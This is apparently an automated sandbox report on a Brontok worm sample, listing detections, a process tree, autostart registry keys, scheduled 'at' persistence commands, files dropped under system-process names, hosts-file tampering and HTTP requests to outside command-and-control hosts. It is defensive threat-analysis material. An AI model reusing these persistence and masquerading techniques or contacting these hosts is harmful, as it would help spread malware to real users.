Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pedang @ P#U00ecsau.exe

Overview

General Information

Sample name:Pedang @ P#U00ecsau.exe
renamed because original name is a hash value
Original sample name:Pedang @ Psau.exe
Analysis ID:1592395
MD5:32798ad1498394ac5602e8801b00aadb
SHA1:d9720c040d947477392e68b92a0575b8d9d31609
SHA256:1afb0258c432833baefe232e6f0c2015259f536670e2a8fe1cb6b191776c7864
Infos:

Detection

Brontok
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Brontok
Changes the view of files in windows explorer (hidden files and folders)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Disables the Windows registry editor (regedit)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for available system drives (often done to infect USB drives)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • Pedang @ P#U00ecsau.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe" MD5: 32798AD1498394AC5602E8801B00AADB)
    • explorer.exe (PID: 2744 cmdline: explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
    • smss.exe (PID: 6868 cmdline: C:\Users\user\AppData\Local\smss.exe MD5: 32798AD1498394AC5602E8801B00AADB)
      • winlogon.exe (PID: 6724 cmdline: C:\Users\user\AppData\Local\winlogon.exe MD5: 32798AD1498394AC5602E8801B00AADB)
      • at.exe (PID: 6984 cmdline: at /delete /y MD5: 2AE20048111861FA09B709D3CC551AD6)
        • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • at.exe (PID: 3900 cmdline: at 17:08 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com" MD5: 2AE20048111861FA09B709D3CC551AD6)
        • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • at.exe (PID: 7160 cmdline: at 11:03 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com" MD5: 2AE20048111861FA09B709D3CC551AD6)
        • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • services.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\services.exe MD5: 32798AD1498394AC5602E8801B00AADB)
      • lsass.exe (PID: 4176 cmdline: C:\Users\user\AppData\Local\lsass.exe MD5: 32798AD1498394AC5602E8801B00AADB)
        • inetinfo.exe (PID: 676 cmdline: C:\Users\user\AppData\Local\inetinfo.exe MD5: 32798AD1498394AC5602E8801B00AADB)
        • svchost.exe (PID: 1276 cmdline: C:\Users\user\AppData\Local\svchost.exe MD5: 32798AD1498394AC5602E8801B00AADB)
        • cmd.exe (PID: 6272 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Pedang @ P#U00ecsau.exeINDICATOR_EXE_Packed_MEWDetects executables packed with MEWditekSHen

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifINDICATOR_EXE_Packed_MEWDetects executables packed with MEWditekSHen
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifINDICATOR_EXE_Packed_MEWDetects executables packed with MEWditekSHen
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifINDICATOR_EXE_Packed_MEWDetects executables packed with MEWditekSHen
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifINDICATOR_EXE_Packed_MEWDetects executables packed with MEWditekSHen
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifINDICATOR_EXE_Packed_MEWDetects executables packed with MEWditekSHen

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000000.1160595842.0000000000400000.00000002.00000001.01000000.00000003.sdmpINDICATOR_EXE_Packed_MEWDetects executables packed with MEWditekSHen
                00000003.00000002.1247666976.0000000000401000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_BrontokYara detected BrontokJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ProcessId: 6284, TargetFilename: C:\Users\user\AppData\Local\smss.exe
                  Sigma detected: Suspect Svchost Activity
                  Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Local\svchost.exe, CommandLine: C:\Users\user\AppData\Local\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\lsass.exe, ParentImage: C:\Users\user\AppData\Local\lsass.exe, ParentProcessId: 4176, ParentProcessName: lsass.exe, ProcessCommandLine: C:\Users\user\AppData\Local\svchost.exe, ProcessId: 1276, ProcessName: svchost.exe
                  Sigma detected: System File Execution Location Anomaly
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Local\smss.exe, CommandLine: C:\Users\user\AppData\Local\smss.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\smss.exe, NewProcessName: C:\Users\user\AppData\Local\smss.exe, OriginalFileName: C:\Users\user\AppData\Local\smss.exe, ParentCommandLine: "C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe", ParentImage: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ParentProcessId: 6284, ParentProcessName: Pedang @ P#U00ecsau.exe, ProcessCommandLine: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, ProcessName: smss.exe
                  Sigma detected: Windows Binaries Write Suspicious Extensions
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, TargetFilename: C:\Users\user\AppData\Local\winlogon.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\br5205on.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ProcessId: 6284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tok-Cirrhatus-2091
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif
                  Sigma detected: Suspicious Screensaver Binary File Creation
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, TargetFilename: C:\Windows\SysWOW64\user's Setting.scr
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\svchost.exe, CommandLine: C:\Users\user\AppData\Local\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\lsass.exe, ParentImage: C:\Users\user\AppData\Local\lsass.exe, ParentProcessId: 4176, ParentProcessName: lsass.exe, ProcessCommandLine: C:\Users\user\AppData\Local\svchost.exe, ProcessId: 1276, ProcessName: svchost.exe
                  Sigma detected: Unusual Parent Process For Cmd.EXE
                  Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\lsass.exe, ParentImage: C:\Users\user\AppData\Local\lsass.exe, ParentProcessId: 4176, ParentProcessName: lsass.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat, ProcessId: 6272, ProcessName: cmd.exe
                  Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: none, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ProcessId: 6284, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Bron-Spizaetus
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Local\winlogon.exe, CommandLine: C:\Users\user\AppData\Local\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\winlogon.exe, NewProcessName: C:\Users\user\AppData\Local\winlogon.exe, OriginalFileName: C:\Users\user\AppData\Local\winlogon.exe, ParentCommandLine: C:\Users\user\AppData\Local\smss.exe, ParentImage: C:\Users\user\AppData\Local\smss.exe, ParentProcessId: 6868, ParentProcessName: smss.exe, ProcessCommandLine: C:\Users\user\AppData\Local\winlogon.exe, ProcessId: 6724, ProcessName: winlogon.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-16T04:08:25.459364+010020181411A Network Trojan was detected3.94.10.3480192.168.2.1649712TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-16T04:08:15.747206+010028032702Potentially Bad Traffic192.168.2.164970772.14.178.17480TCP
                  2025-01-16T04:08:16.268685+010028032702Potentially Bad Traffic192.168.2.16497083.130.204.16080TCP
                  2025-01-16T04:08:20.298872+010028032702Potentially Bad Traffic192.168.2.1649710103.6.117.280TCP
                  2025-01-16T04:08:25.453585+010028032702Potentially Bad Traffic192.168.2.16497123.94.10.3480TCP
                  2025-01-16T04:08:31.581924+010028032702Potentially Bad Traffic192.168.2.1649713104.21.48.180TCP
                  2025-01-16T04:08:33.368566+010028032702Potentially Bad Traffic192.168.2.1649715104.21.48.180TCP
                  2025-01-16T04:08:35.294924+010028032702Potentially Bad Traffic192.168.2.1649715104.21.48.180TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://www.fajarweb.com/?Avira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifAvira: detection malicious, Label: TR/Brontok.Q
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifAvira: detection malicious, Label: TR/Brontok.Q
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifAvira: detection malicious, Label: TR/Brontok.Q
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifAvira: detection malicious, Label: TR/Brontok.Q
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifAvira: detection malicious, Label: TR/Brontok.Q
                  Multi AV Scanner detection for submitted file
                  Source: Pedang @ P#U00ecsau.exeReversingLabs: Detection: 100%
                  Source: Pedang @ P#U00ecsau.exeVirustotal: Detection: 95%Perma Link
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifJoe Sandbox ML: detected
                  Source: Pedang @ P#U00ecsau.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.70.191:443 -> 192.168.2.16:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 103.6.117.3:443 -> 192.168.2.16:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49716 version: TLS 1.2

                  Spreading

                  barindex
                  Yara detected Brontok
                  Source: Yara matchFile source: 00000003.00000002.1247666976.0000000000401000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: z:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: y:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: x:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: w:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: v:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: u:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: t:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: s:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: r:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: q:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: p:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: o:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: n:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: m:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: l:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: k:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: j:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: i:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: h:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: g:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: f:
                  Source: C:\Users\user\AppData\Local\winlogon.exeFile opened: e:
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData

                  Networking

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 172.67.70.191 443
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 3.94.10.34 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 72.14.178.174 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 3.130.204.160 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 103.6.117.2 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 103.6.117.3 443
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49713 -> 104.21.48.1:80
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49710 -> 103.6.117.2:80
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49712 -> 3.94.10.34:80
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49708 -> 3.130.204.160:80
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49715 -> 104.21.48.1:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.16:49712
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49707 -> 72.14.178.174:80
                  Source: global trafficHTTP traffic detected: GET /WS1/cgi/x.cgi?NAVG=Tracker&username=%64%65%6C%62%65%6C%62%72%6F HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.debuging.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /? HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.17tahun.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /? HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.kaskus.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /? HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.fajarweb.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /Kids/dbrotlu/Bron-IDUTSPLD.css HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.20mbweb.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /Kids/dbrotlu/IN18.css HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.20mbweb.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /Kids/dbrotlu/Host18.css HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.20mbweb.comCache-Control: no-cache
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /WS1/cgi/x.cgi?NAVG=Tracker&username=%64%65%6C%62%65%6C%62%72%6F HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.debuging.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /? HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.17tahun.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /? HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.kaskus.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /? HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.fajarweb.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /Kids/dbrotlu/Bron-IDUTSPLD.css HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.20mbweb.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /Kids/dbrotlu/IN18.css HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.20mbweb.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /Kids/dbrotlu/Host18.css HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux)Host: www.20mbweb.comCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: google.com
                  Source: global trafficDNS traffic detected: DNS query: www.debuging.com
                  Source: global trafficDNS traffic detected: DNS query: www.17tahun.com
                  Source: global trafficDNS traffic detected: DNS query: www.hugedomains.com
                  Source: global trafficDNS traffic detected: DNS query: www.kaskus.com
                  Source: global trafficDNS traffic detected: DNS query: www.kaskus.co.id
                  Source: global trafficDNS traffic detected: DNS query: www.fajarweb.com
                  Source: global trafficDNS traffic detected: DNS query: www.20mbweb.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownHTTPS traffic detected: 172.67.70.191:443 -> 192.168.2.16:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 103.6.117.3:443 -> 192.168.2.16:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49716 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: Pedang @ P#U00ecsau.exe, type: SAMPLEMatched rule: Detects executables packed with MEW Author: ditekSHen
                  Source: 00000000.00000000.1160595842.0000000000400000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables packed with MEW Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: Detects executables packed with MEW Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: Detects executables packed with MEW Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: Detects executables packed with MEW Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: Detects executables packed with MEW Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: Detects executables packed with MEW Author: ditekSHen
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Windows\SysWOW64\sistem.sys
                  Source: C:\Users\user\AppData\Local\inetinfo.exeFile created: C:\Windows\System32\drivers\etc\hosts-Denied By-user.com
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Windows\SysWOW64\sistem.sys
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Windows\ShellNew\bbm-xoomnhfc.exe
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Windows\SysWOW64\cmd-bro-nmx.exe
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Windows\sembako-cfzjmnh.exe
                  Source: C:\Users\user\AppData\Local\smss.exeFile created: C:\Windows\SysWOW64\user's Setting.scr
                  Source: C:\Users\user\AppData\Local\smss.exeFile created: C:\Windows\SysWOW64\DXBLBO.exe
                  Source: C:\Users\user\AppData\Local\inetinfo.exeFile created: C:\Windows\System32\drivers\etc\hosts-Denied By-user.com
                  Source: C:\Users\user\AppData\Local\inetinfo.exeFile deleted: C:\Windows\System32\drivers\etc\hosts-Denied By-user.com
                  Source: Pedang @ P#U00ecsau.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: Pedang @ P#U00ecsau.exe, type: SAMPLEMatched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
                  Source: 00000000.00000000.1160595842.0000000000400000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
                  Source: classification engineClassification label: mal100.spre.evad.winEXE@29/18@9/24
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Users\user\AppData\Local\BronMesPedang @ P#U00ecsau.ini
                  Source: C:\Users\user\AppData\Local\svchost.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
